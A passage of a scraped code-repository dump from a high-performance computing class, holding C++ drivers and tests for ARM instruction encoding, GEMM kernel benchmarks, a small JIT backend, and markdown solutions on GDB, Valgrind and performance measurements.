std::bitset<32>(l_data10) << std::endl;\n\n unsigned int l_data11 = 0b1001 ^ 0b01111;\n std::cout << \"unsigned int l_data11 = 0b1001 ^ 0b01111: \" << std::bitset<32>(l_data11) << std::endl;\n\n unsigned int l_data12 = ~0b1001;\n std::cout << \"unsigned int l_data12 = ~0b1001: \" << std::bitset<32>(l_data12) << std::endl;\n\n unsigned int l_data13 = 0xF0 & 0b1010101;\n std::cout << \"unsigned int l_data13 = 0xF0 & 0b1010101: \" << std::bitset<32>(l_data13) << std::endl;\n\n unsigned int l_data14 = 0b001 | 0b101;\n std::cout << \"unsigned int l_data14 = 0b001 | 0b101: \" << std::bitset<32>(l_data14) << std::endl;\n\n unsigned int l_data15 = 7743;\n std::cout << \"unsigned int l_data15 = 7743: \" << std::bitset<32>(l_data15) << std::endl;\n\n int l_data16 = -7743;\n std::cout << \"int l_data16 = -7743: \" << std::bitset<32>(l_data16) << std::endl;\n\n std::cout << \"#############\" << std::endl << std::endl;\n\n std::cout << \"Testing instruction_asimd_compute:\" << std::endl;\n 
std::cout << \"Test case 1: \";\n\n unsigned int i_vec_instr = 0b01001110001000001100110000000000;\n //0b01001110001000101100110000100000\n unsigned char i_vec_reg_dst = 0b00000000;\n unsigned char i_vec_reg_src_0 = 0b00000001;\n unsigned char i_vec_reg_src_1 = 0b00000010;\n unsigned int result = 0b01001110001000101100110000100000;\n\n if (instruction_asimd_compute(i_vec_instr, i_vec_reg_dst, i_vec_reg_src_0, i_vec_reg_src_1) == result)\n std::cout << \"Success!\" << std::endl;\n else\n {\n std::cout << \"Failed!\" << std::endl;\n std::cout << \"expected:\" << std::bitset<32>(result) << std::endl;\n std::cout << \"received:\" << std::bitset<32>(instruction_asimd_compute(i_vec_instr, i_vec_reg_dst, i_vec_reg_src_0, i_vec_reg_src_1)) << std::endl;\n }\n\n std::cout << \"Test case 2: \";\n i_vec_instr = 0;\n i_vec_reg_dst = 0xFF;\n i_vec_reg_src_0 = 0xFF;\n i_vec_reg_src_1 = 0xFF;\n result = 0b00000000000111110000001111111111;\n if (instruction_asimd_compute(i_vec_instr, i_vec_reg_dst, i_vec_reg_src_0, i_vec_reg_src_1) == result)\n std::cout << \"Success!\" << std::endl;\n else\n {\n std::cout << \"Failed!\" << std::endl;\n std::cout << \"expected:\" << std::bitset<32>(result) << std::endl;\n std::cout << \"received:\" << std::bitset<32>(instruction_asimd_compute(i_vec_instr, i_vec_reg_dst, i_vec_reg_src_0, i_vec_reg_src_1)) << std::endl;\n }\n\n std::cout << \"Test case 3: \";\n i_vec_instr = 0b01010101010101010101010101010101;\n i_vec_reg_dst = 0b00001010;\n i_vec_reg_src_0 = 0b00011111;\n i_vec_reg_src_1 = 0b00000000;\n result = 0b01010101010000000101011111101010;\n if (instruction_asimd_compute(i_vec_instr, i_vec_reg_dst, i_vec_reg_src_0, i_vec_reg_src_1) == result)\n std::cout << \"Success!\" << std::endl;\n else\n {\n std::cout << \"Failed!\" << std::endl;\n std::cout << \"expected:\" << std::bitset<32>(result) << std::endl;\n std::cout << \"received:\" << std::bitset<32>(instruction_asimd_compute(i_vec_instr, i_vec_reg_dst, i_vec_reg_src_0, i_vec_reg_src_1)) << std::endl;\n }\n\n\n}\n\nunsigned int instruction_asimd_compute( unsigned int i_vec_instr,\n unsigned char i_vec_reg_dst,\n unsigned char i_vec_reg_src_0,\n unsigned char i_vec_reg_src_1 )\n{\n //Idee erst mit Bitmaske entsprechende Elemente in i_vec_instr auf 0 setzen\n //dann oder mit entsprechenden parameter bits\n return (i_vec_instr & ~0x001F03FF) | (i_vec_reg_dst & 0x1F) //Bits 0-4 should be set to bits 0-4 of i_vec_reg_dst\n | ((static_cast<unsigned int>(i_vec_reg_src_0) & 0x1F) << 5) //Bits 5-9 should be set to bits 0-4 of i_vec_reg_src_0\n | ((static_cast<unsigned int>(i_vec_reg_src_1) & 0x1F) << 16); //Bits 16-20 should be set to bits 0-4 of i_vec_reg_src_1\n}" }, { "alpha_fraction": 0.45584726333618164, "alphanum_fraction": 0.5107398629188538, "avg_line_length": 13.448275566101074, "blob_id": "b42be9e3e501cb903b884c2c29cef72642d71cb5", "content_id": "738eaa71f28021634056315adf63612639f8283e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 419, "license_type": "no_license", "max_line_length": 53, "num_lines": 29, "path": "/exercise_5/task2/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <cstdint>\n#include <cstdlib>\n\nextern \"C\" {\n void load_asm( uint64_t const * i_a );\n}\n\nint main() {\n uint64_t * l_a = new uint64_t[10];\n for( unsigned short l_va = 0; l_va < 10; l_va++ ) {\n l_a[l_va] = (l_va+1)*100;\n }\n\n // ok\n load_asm( l_a+2 );\n\n // not ok #1\n load_asm( l_a+12 );\n\n // not ok #2\n load_asm( l_a+8 
);\n\n // not ok #3\n load_asm( l_a+6 );\n\n delete[] l_a;\n\n return EXIT_SUCCESS;\n}\n" }, { "alpha_fraction": 0.6649852991104126, "alphanum_fraction": 0.7183690667152405, "avg_line_length": 47.53061294555664, "blob_id": "865d088758e24e3d528c40c2abfa26635026769e", "content_id": "70137ec5b4bc1f8537bc4c3a244629b7d09fd857", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2379, "license_type": "no_license", "max_line_length": 283, "num_lines": 49, "path": "/exercise_5/solution.md", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "# A New World\n\n\n# GDB and Valgrind\n\n## Assembly code explanation \n\nThe assembly code does the following job: \nFirst it increments the address in register x0 by 8 bytes and loads the value at that address into register x1. \nAfter this it loads the value at address x0 + 8 into register x2 and the value at address x0 + 8 + 8 into register x3 (where +8 stands for +8 bytes).\nFinally the value at address x0 + 8 + 16 is loaded into register x4 and the value at address x0 + 8 + 16 + 8 into register x5.\n\nWhen used with the function call load_asm(l_a + 2) the address l_a + 2 * sizeof(uint64_t) is saved in register x0. Since a uint64_t is 8 bytes on our 64-bit Neoverse N1, the address of the third element (value 300) is saved in register x0. \nExecuting the three statements gives us the following values for registers x1 to x5:\n\nx1 = 400\nx2 = 400\nx3 = 500\nx4 = 600\nx5 = 700\n\n## Running GDB\n\nThe values for our 5 registers after executing load_asm step by step:\nx0 0x432ec8 4402888\nx1 0x190 400\nx2 0x190 400\nx3 0x1f4 500\nx4 0x258 600\nx5 0x2bc 700\n\n## Valgrind\n\nRunning lines 18, 21, and 24 is problematic because we read data outside of our allocated memory. \nThe function call in line 18 causes problems from the beginning because we start to read data 4 * 8 bytes after the last element of l_a. \n\nThe call in line 21 starts fine and reads the last value of l_a into registers x1 and x2; however, the second load of the ldp is problematic again (since it exceeds the boundaries of the allocated space). \n\nThe call in line 24 works fine until the last load operation of the ldp. \n\n# Copying data\n\nThe written and generated files can be found in the repository. \nWe can observe two things:\n\n(1) the compiler does not unroll the loop and therefore produces overhead for incrementing and comparing the loop counter and for the jumps\n(2) the generated code manipulates the address registers in extra steps and loads only single values instead of pairs. The reason behind this is probably the added flexibility required by the loop. \n\nAs far as I can see there is nearly no difference between the generated and the disassembled variant of our copy_c function. Maybe optimization flags would make a difference in terms of loop unrolling. 
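\n\nTo illustrate observation (1), here is a small sketch of my own (it is not part of the submitted code): a manually unrolled variant of copy_c that removes the loop-counter increment, compare and jump entirely:\n\n```c\n#include <stdint.h>\n\n// unrolled copy: widens seven uint32_t values to uint64_t\n// with straight-line code and no loop bookkeeping\nvoid copy_c_unrolled(uint32_t const * i_a,\n uint64_t * o_b)\n{\n o_b[0] = i_a[0];\n o_b[1] = i_a[1];\n o_b[2] = i_a[2];\n o_b[3] = i_a[3];\n o_b[4] = i_a[4];\n o_b[5] = i_a[5];\n o_b[6] = i_a[6];\n}\n```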
\n" }, { "alpha_fraction": 0.4113389551639557, "alphanum_fraction": 0.4620024263858795, "avg_line_length": 20.256410598754883, "blob_id": "bef8ca7a8e404ceae9bf7482544aacbd2289656c", "content_id": "9e47e168b11a7f2ddff3d68a43017e6ba0bb11c8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 829, "license_type": "no_license", "max_line_length": 101, "num_lines": 39, "path": "/exercise_8/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <iostream>\n#include <cstdint>\n\nextern \"C\" \n{\n void sve_example_0(uint32_t * in, uint32_t * out);\n void sve_example_2(uint32_t * in, uint32_t * out);\n}\n\nint main(int argc, char const * argv[]) \n{\n if (argc != 2) \n {\n std::cerr << \"Run: \" << argv[0] << \" <0|2>\" << std::endl;\n return 0;\n }\n int example = atoi(argv[1]);\n\n uint32_t dataIn[128] = {0};\n uint32_t dataOut[128] = {0};\n\n for (unsigned int i = 0; i < 128; ++i)\n {\n dataIn[i] = (i + 1) * 2;\n }\n\n if (example == 0) \n {\n sve_example_0(dataIn, dataOut);\n }\n else if (example == 2)\n {\n sve_example_2(dataIn, dataOut);\n }\n for (unsigned int i = 0; i < 128; ++i)\n {\n std::cout << \"i / in / out: \" << i << \" / \" << dataIn[i] << \" / \" << dataOut[i] << std::endl;\n } \n}\n" }, { "alpha_fraction": 0.5157516002655029, "alphanum_fraction": 0.547254741191864, "avg_line_length": 30.158878326416016, "blob_id": "19edeb08691e504bb4aedc3a5a77e46cca7c3caa", "content_id": "f933d24f28c1c10f796df92c20d36a8c15c42d2c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3333, "license_type": "no_license", "max_line_length": 66, "num_lines": 107, "path": "/exercise_9/mini_jit_base/src/instructions/Base.h", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef MINI_JIT_INSTRUCTIONS_BASE_H\n#define MINI_JIT_INSTRUCTIONS_BASE_H\n\n#include <cstdint>\n\nnamespace mini_jit {\n namespace instructions {\n class Base;\n }\n}\n\nclass mini_jit::instructions::Base {\n public:\n /**\n * Gets the machine code for the return instruction.\n * \n * @return return instruction.\n **/ \n static uint32_t bRet();\n\n /**\n * Gets the machine code for compare and branch on nonzero.\n *\n * @param i_regGp general purpose register which is compared.\n * @param i_imm19 value of the 19-bit immediate.\n * @param i_size 32-bit version if 0, 64-bit version if 1.\n *\n * @return instruction.\n **/\n static uint32_t bCbnz( uint8_t i_regGp,\n int32_t i_imm19,\n uint8_t i_size );\n\n /**\n * Gets the machine code for a move.\n *\n * @param i_regGp general purpose register which is set.\n * @param i_imm16 value of the 16-bit immediate.\n * @param i_size 32-bit version if 0, 64-bit version if 1.\n *\n * @return instruction.\n **/\n static uint32_t dpMovImm( uint8_t i_regGp,\n uint16_t i_imm16,\n uint8_t i_size );\n\n /**\n * Gets the machine code for a move between registers.\n *\n * @param i_regGpDes general purpose register which is set.\n * @param i_regGpSrc general purpose register source\n * @param i_size 32-bit version if 0, 64-bit version if 1.\n *\n * @return instruction.\n **/\n static uint32_t dpMovReg( uint8_t i_regGpDes,\n uint8_t i_regGpSrc,\n uint8_t i_size );\n\n /**\n * Gets the machine code for add immediate.\n *\n * @param i_regGpDes general purpose destination register.\n * @param i_regGpSrc general purpose source register.\n * @param i_imm12 value of the 12-bit immediate.\n * @param i_size 32-bit version if 0, 64-bit version if 
1.\n *\n * @return instruction.\n **/\n static uint32_t dpAddImm( uint8_t i_regGpDes,\n uint8_t i_regGpSrc,\n uint16_t i_imm12,\n uint8_t i_size );\n\n /**\n * Gets the machine code for sub immediate.\n *\n * @param i_regGpDes general purpose destination register.\n * @param i_regGpSrc general purpose source register.\n * @param i_imm12 value of the 12-bit immediate.\n * @param i_size 32-bit version if 0, 64-bit version if 1.\n *\n * @return instruction.\n **/\n static uint32_t dpSubImm( uint8_t i_regGpDes,\n uint8_t i_regGpSrc,\n uint16_t i_imm12,\n uint8_t i_size );\n\n\n /**\n * Gets the machine code for multiply.\n *\n * @param i_regGpDes general purpose destination register.\n * @param i_regGpSrc1 general purpose source register 1.\n * @param i_regGpSrc2 general purpose source register 2.\n * @param i_size 32-bit version if 0, 64-bit version if 1.\n *\n * @return instruction.\n **/\n static uint32_t dpMulReg( uint8_t i_regGpDes,\n uint8_t i_regGpSrc1,\n uint8_t i_regGpSrc2,\n uint8_t i_size );\n};\n\n#endif" }, { "alpha_fraction": 0.3260393738746643, "alphanum_fraction": 0.4310722053050995, "avg_line_length": 35.153846740722656, "blob_id": "50070c613524df66f554e5e37e4f33676f1d19f0", "content_id": "176ed425dd846c1743ba8c4fde122f11d2cfa6a8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 457, "license_type": "no_license", "max_line_length": 60, "num_lines": 13, "path": "/exercise_4/src/gemm_compiler_32_32_32_32_32_32.hpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef GEMM_COMPILER_32_32_32_32_32_32_HPP\n#define GEMM_COMPILER_32_32_32_32_32_32_HPP\n\nvoid gemm_compiler_32_32_32_32_32_32_mnk(float const* i_a,\n float const* i_b,\n float* io_c);\n\n\nvoid gemm_compiler_32_32_32_32_32_32_nkm(float const* i_a,\n float const* i_b,\n float* io_c);\n\n#endif\n" }, { "alpha_fraction": 0.49537840485572815, "alphanum_fraction": 0.5106874704360962, "avg_line_length": 28.84482765197754, "blob_id": "c61dad1d04cb973076c4943aea7eaeff0e9c8405", "content_id": "ed95898865236f2fbd7bd49bfb94619b888d656f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3462, "license_type": "no_license", "max_line_length": 110, "num_lines": 116, "path": "/exercise_6/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"../exercise_4/src/util.hpp\"\n#include \"../exercise_4/src/gemm_ref.hpp\"\n\n#include <vector>\n#include <iostream>\n#include <chrono>\n\nextern \"C\"\n{\n void gemm_asm_asimd_16_4_4(float const * i_a,\n float const * i_b,\n float * io_c);\n \n void gemm_asm_asimd_16_4_12(float const * i_a,\n float const * i_b,\n float * io_c);\n}\n\nint main()\n{\n const unsigned int iterations = 100000000;\n unsigned int m = 16;\n unsigned int n = 4;\n unsigned int k = 4;\n \n \n float* A = random_matrix(m, k, m);\n float* B = random_matrix(k, n, k);\n float* C_ref = zero_matrix(m, n, m);\n float* C_kernel = zero_matrix(m, n, m);\n \n gemm_asm_asimd_16_4_4(A, B, C_kernel);\n gemm_ref(A, B, C_ref, m, n, k, m, k, m);\n \n \n std::cout << \"Comparing results...\";\n if (compare_matrices(C_ref, C_kernel, m, n, m, m))\n {\n std::cout << \"passed\";\n }\n else\n {\n std::cout << \"failed\";\n }\n std::cout << std::endl;\n \n \n int flop_gemm = m * n * k * 2;\n std::cout << \"Necessary floating point operations per gemm: \" << flop_gemm << std::endl;\n \n std::cout << \"Starting time measuring.\" << std::endl;\n \n auto start_time = 
std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n gemm_asm_asimd_16_4_4(A, B, C_kernel);\n }\n auto end_time = std::chrono::high_resolution_clock::now();\n std::chrono::duration<double> needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained FLOPS: \" << flop_gemm * ((double) iterations) / needed_time.count() << std::endl;\n \n delete[] A;\n delete[] B;\n delete[] C_ref;\n delete[] C_kernel;\n \n std::cout << std::endl << \"#################\" << std::endl << \"16x12x4\" << std::endl;\n \n k = 12;\n A = random_matrix(m, k, m);\n B = random_matrix(k, n, k);\n C_ref = zero_matrix(m, n, m);\n C_kernel = zero_matrix(m, n, m);\n \n gemm_asm_asimd_16_4_12(A, B, C_kernel);\n gemm_ref(A, B, C_ref, m, n, k, m, k, m);\n \n \n std::cout << \"Comparing results...\";\n if (compare_matrices(C_ref, C_kernel, m, n, m, m))\n {\n std::cout << \"passed\";\n }\n else\n {\n std::cout << \"failed\";\n }\n std::cout << std::endl;\n \n \n flop_gemm = m * n * k * 2;\n std::cout << \"Necessary floating point operations per gemm: \" << flop_gemm << std::endl;\n \n std::cout << \"Starting time measuring.\" << std::endl;\n \n start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n gemm_asm_asimd_16_4_12(A, B, C_kernel);\n }\n end_time = std::chrono::high_resolution_clock::now();\n needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained FLOPS: \" << flop_gemm * ((double) iterations) / needed_time.count() << std::endl;\n \n delete[] A;\n delete[] B;\n delete[] C_ref;\n delete[] C_kernel;\n\n}\n" }, { "alpha_fraction": 0.3631284832954407, "alphanum_fraction": 0.3966480493545532, "avg_line_length": 16.899999618530273, "blob_id": "8cf87b1172283108132170373adcd5484c26849a", "content_id": "bdb538901f8391f6ac5a3c9a21ede19e48834546", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C", "length_bytes": 179, "license_type": "no_license", "max_line_length": 40, "num_lines": 10, "path": "/exercise_5/task3/copy.c", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <stdint.h>\n\nvoid copy_c(uint32_t const * i_a,\n uint64_t * o_b)\n{\n for (unsigned int i = 0; i < 7; ++i)\n {\n *(o_b + i) = *(i_a + i);\n }\n}\n" }, { "alpha_fraction": 0.4936569333076477, "alphanum_fraction": 0.514340877532959, "avg_line_length": 29.21666717529297, "blob_id": "05891db467200f3338478055f1d0745a3f3e4019", "content_id": "1d1230616cd08fc81cfd2f7b1f83917a592c6bb1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3626, "license_type": "no_license", "max_line_length": 116, "num_lines": 120, "path": "/exercise_7/driver.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"../exercise_4/src/util.hpp\"\n#include \"../exercise_4/src/gemm_ref.hpp\"\n\n#include <vector>\n#include <iostream>\n#include <chrono>\n\nextern \"C\"\n{\n void gemm_asm_asimd_19_4_4(float const * i_a,\n float const * i_b,\n float * io_c);\n \n void gemm_asm_asimd_32_32_32(float const * i_a,\n float const * i_b,\n float * io_c);\n}\n\nint 
main()\n{\n const unsigned int iterations = 100000000;\n const unsigned int iterations_large = 1000000;\n unsigned int m = 19;\n unsigned int n = 4;\n unsigned int k = 4;\n \n \n float* A = random_matrix(m, k, m);\n float* B = random_matrix(k, n, k);\n float* C_ref = zero_matrix(m, n, m);\n float* C_kernel = zero_matrix(m, n, m);\n \n gemm_asm_asimd_19_4_4(A, B, C_kernel);\n gemm_ref(A, B, C_ref, m, n, k, m, n, m);\n \n std::cout << \"19x4x4\" << std::endl;\n \n std::cout << \"Comparing results...\";\n if (compare_matrices(C_ref, C_kernel, m, n, m, m, 1.0e-6f, true))\n {\n std::cout << \"passed\";\n }\n else\n {\n std::cout << \"failed\";\n }\n std::cout << std::endl;\n \n \n int flop_gemm = m * n * k * 2;\n std::cout << \"Necessary floating point operations per gemm: \" << flop_gemm << std::endl;\n \n std::cout << \"Starting time measuring.\" << std::endl;\n \n auto start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations; ++i) \n {\n gemm_asm_asimd_19_4_4(A, B, C_kernel);\n }\n auto end_time = std::chrono::high_resolution_clock::now();\n std::chrono::duration<double> needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations << std::endl;\n std::cout << \"Sustained FLOPS: \" << flop_gemm * ((double) iterations) / needed_time.count() << std::endl;\n \n delete[] A;\n delete[] B;\n delete[] C_ref;\n delete[] C_kernel;\n \n std::cout << std::endl << \"#################\" << std::endl << \"32x32x32\" << std::endl;\n \n m = 32;\n n = 32;\n k = 32;\n A = random_matrix(m, k, m);\n B = random_matrix(k, n, k);\n C_ref = zero_matrix(m, n, m);\n C_kernel = zero_matrix(m, n, m);\n \n gemm_asm_asimd_32_32_32(A, B, C_kernel);\n gemm_ref(A, B, C_ref, m, n, k, m, k, m);\n \n \n std::cout << \"Comparing results...\";\n if (compare_matrices(C_ref, C_kernel, m, n, m, m))\n {\n std::cout << \"passed\";\n }\n else\n {\n std::cout << \"failed\";\n }\n std::cout << std::endl;\n \n \n flop_gemm = m * n * k * 2;\n std::cout << \"Necessary floating point operations per gemm: \" << flop_gemm << std::endl;\n \n std::cout << \"Starting time measuring.\" << std::endl;\n \n start_time = std::chrono::high_resolution_clock::now();\n for (size_t i = 0; i < iterations_large; ++i) \n {\n gemm_asm_asimd_32_32_32(A, B, C_kernel);\n }\n end_time = std::chrono::high_resolution_clock::now();\n needed_time = end_time - start_time;\n \n std::cout << \"Needed time for \" << iterations_large << \" multiplications: \" << needed_time.count() << std::endl;\n std::cout << \"Average time: \" << needed_time.count() / iterations_large << std::endl;\n std::cout << \"Sustained FLOPS: \" << flop_gemm * ((double) iterations_large) / needed_time.count() << std::endl;\n \n delete[] A;\n delete[] B;\n delete[] C_ref;\n delete[] C_kernel;\n \n}\n" }, { "alpha_fraction": 0.5394446849822998, "alphanum_fraction": 0.5478184223175049, "avg_line_length": 23.94505500793457, "blob_id": "5fb97b8c02e34d1c823d54b9a134c53d06bc5e49", "content_id": "028d5876eade3e13b8cbb164cefd437e3d46d77e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2269, "license_type": "no_license", "max_line_length": 75, "num_lines": 91, "path": "/exercise_9/mini_jit_base/src/backend/Kernel.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"Kernel.h\"\n#include <sys/mman.h>\n#include 
<unistd.h>\n#include <cassert>\n#include <iostream>\n#include <fstream>\n\nmini_jit::backend::Kernel::~Kernel() {\n free();\n}\n\nvoid * mini_jit::backend::Kernel::allocMmap( std::size_t i_nBytes ) const {\n void* l_mem = mmap( 0,\n i_nBytes,\n PROT_READ | PROT_WRITE,\n MAP_PRIVATE | MAP_ANONYMOUS,\n -1,\n 0 );\n\n return l_mem;\n}\n\nvoid mini_jit::backend::Kernel::freeMmap( std::size_t i_nBytes,\n void * i_mem ) const {\n munmap( i_mem,\n i_nBytes );\n}\n\nvoid mini_jit::backend::Kernel::setExecutable( std::size_t i_nBytes,\n void * i_mem ) const {\n mprotect( i_mem,\n i_nBytes,\n PROT_READ | PROT_EXEC );\n}\n\nvoid mini_jit::backend::Kernel::addInstruction( uint32_t i_ins ) {\n m_codeBuffer.push_back( i_ins );\n m_offset += 4;\n}\n\nvoid mini_jit::backend::Kernel::resetOffset() {\n m_offset = 0;\n}\n\nuint32_t mini_jit::backend::Kernel::getOffset() {\n return m_offset;\n}\n\nuint32_t mini_jit::backend::Kernel::getSize() {\n return m_codeBuffer.size() * 4;\n}\n\nvoid mini_jit::backend::Kernel::setKernel() {\n // alloc mempage\n m_sizeKernel = getpagesize();\n assert( m_sizeKernel >= m_codeBuffer.size()*4 );\n m_kernel = (uint32_t*) allocMmap( m_sizeKernel );\n\n // copy machine code over\n for( std::size_t l_in = 0; l_in < m_codeBuffer.size(); l_in++ ) {\n m_kernel[l_in] = m_codeBuffer[l_in];\n }\n\n // set executable\n setExecutable( m_sizeKernel,\n m_kernel );\n}\n\nvoid const * mini_jit::backend::Kernel::getKernel() const {\n return m_kernel;\n}\n\nvoid mini_jit::backend::Kernel::free() {\n m_codeBuffer.resize( 0 );\n if( m_kernel != nullptr ) {\n freeMmap( m_sizeKernel,\n m_kernel );\n }\n m_sizeKernel = 0;\n}\n\nvoid mini_jit::backend::Kernel::write( char const *i_path ) const {\n std::ofstream l_out ( i_path,\n std::ios::out | std::ios::binary );\n if( !l_out ) {\n std::cerr << \"error: failed to open file: \" << i_path << std::endl;\n return;\n }\n l_out.write( (char*) m_codeBuffer.data(),\n m_codeBuffer.size()*4 );\n}" }, { "alpha_fraction": 0.31972789764404297, "alphanum_fraction": 0.646258533000946, "avg_line_length": 36, "blob_id": "1088e68a79ef278cbda9d27891069ec383227572", "content_id": "26017a894a9df848a19c2448a94add89ac33a037", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 147, "license_type": "no_license", "max_line_length": 48, "num_lines": 4, "path": "/exercise_7/solution.md", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "Kernel | time (s) | #executions | GFLOPS | %peak\n---|---|---|---|---\nMarkus 19x4x4 | 3.161 | 100000000 | 19.23 | 0.48\nMarkus 32x32x32 | 1.739 | 1000000 | 37.67 | 0.94" }, { "alpha_fraction": 0.724863588809967, "alphanum_fraction": 0.7552611231803894, "avg_line_length": 36.735294342041016, "blob_id": "78d35a8a69012532811e5706deffdcfb9e134147", "content_id": "95dce33bb0354a6aa613288e16a20fde55d9e1b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1283, "license_type": "no_license", "max_line_length": 194, "num_lines": 34, "path": "/exercise_4/solution.md", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "## Task 4.1 \n\nCompiling and executing the test (Note to myself: makefile!):\n\ng++ -o gemm_ref_test src/gemm_ref_test.cpp src/gemm_ref.cpp src/util.cpp\n\nTest passed\n\n## Task 4.2 and 4.3\n\nExpected floating point operations:\n\nFor C_{i,j} we have to multiply k times and add k - 1 times. Total: 2k - 1 operations\n\nC has m \\cdot n entries. 
Therefore the total number of floating point operations is mn(2k - 1). For m = n = k = 32 this gives 32 \cdot 32 \cdot 63 = 64512 operations.\n\n\nCompiling: \n\ng++ -O{i} -o driver_O{i} src/driver.cpp src/gemm_ref.cpp src/util.cpp src/gemm_compiler_32_32_32_32_32_32.cpp\n\ni \in {0, 2, 3}\n\nNote: I'm printing FLOPS to the command line, not GFLOPS; the label in the result log file is wrong. \n\nPerformance for no optimization: \nFor the reference kernel we get roughly 3e+8 FLOPS (0.3 GFLOPS).\nThe optimized kernel has a performance of ~0.4 GFLOPS.\n\nOptimization level 2 increases the performance of the reference kernel to 2 GFLOPS, while the optimized kernel reaches ~2.3 GFLOPS.\n\nAt optimization level 3 the performance of the reference kernel increases slightly to 2.2 GFLOPS, while the performance of the optimized kernel stays nearly the same. \n\nHowever, comparing the mnk and the nkm versions of the kernel, the latter performs slightly better. The reason for this might be better cache usage and locality in the nkm version.\n" }, { "alpha_fraction": 0.44891121983528137, "alphanum_fraction": 0.4539363384246826, "avg_line_length": 27.428571701049805, "blob_id": "738bb001d646d230f0048968b0a144db1bfe3fa5", "content_id": "6382a5cd1693d654c69546d031e6e5b4fa3685e4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 597, "license_type": "no_license", "max_line_length": 42, "num_lines": 21, "path": "/exercise_4/src/util.hpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#ifndef UTIL_HPP\n#define UTIL_HPP\n\nbool compare_matrices(float const* i_a,\n float const* i_b,\n unsigned int i_m,\n unsigned int i_n,\n unsigned int i_lda,\n unsigned int i_ldb,\n float eps = 1.0e-6f,\n\t\t bool verbose = false);\n\nfloat* random_matrix(unsigned int i_m, \n unsigned int i_n, \n unsigned int i_ld);\n\nfloat* zero_matrix(unsigned int i_m,\n unsigned int i_n,\n unsigned int i_ld);\n\n#endif\n" }, { "alpha_fraction": 0.36097562313079834, "alphanum_fraction": 0.3658536672592163, "avg_line_length": 23.600000381469727, "blob_id": "7ab19e7cd2c4c11fd1799c0a62af62455424a196", "content_id": "9103cf46cd056f074603c8226bafa3466a123da3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 615, "license_type": "no_license", "max_line_length": 85, "num_lines": 25, "path": "/exercise_4/src/gemm_ref.cpp", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include \"gemm_ref.hpp\"\n\n#include <cstddef>\n\nvoid gemm_ref(float const* i_a,\n float const* i_b,\n float * io_c,\n unsigned int i_m,\n unsigned int i_n,\n unsigned int i_k,\n unsigned int i_lda,\n unsigned int i_ldb,\n unsigned int i_ldc) \n{\n for (size_t m = 0; m < i_m; ++m) \n {\n for (size_t n = 0; n < i_n; ++n)\n {\n for (size_t k = 0; k < i_k; ++k)\n {\n io_c[(i_ldc * n) + m] += i_a[(i_lda * k) + m] * i_b[(i_ldb * n) + k];\n }\n }\n }\n}\n" }, { "alpha_fraction": 0.5409760475158691, "alphanum_fraction": 0.5474217534065247, "avg_line_length": 18.935779571533203, "blob_id": "6652c9ec999bbf0b7866ed6fdc235f61b51f735e", "content_id": "f3e6309748bdb1e6900b45984ef6c7ef4f267913", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2172, "license_type": "no_license", "max_line_length": 57, "num_lines": 109, "path": "/exercise_9/mini_jit_base/src/backend/Kernel.h", "repo_name": "MarkusFischer/hpc-class", "src_encoding": "UTF-8", "text": "#include <cstdint>\n#include <vector>\n#include <string>\n\n#ifndef MINI_JIT_BACKEND_KERNEL_H\n#define 
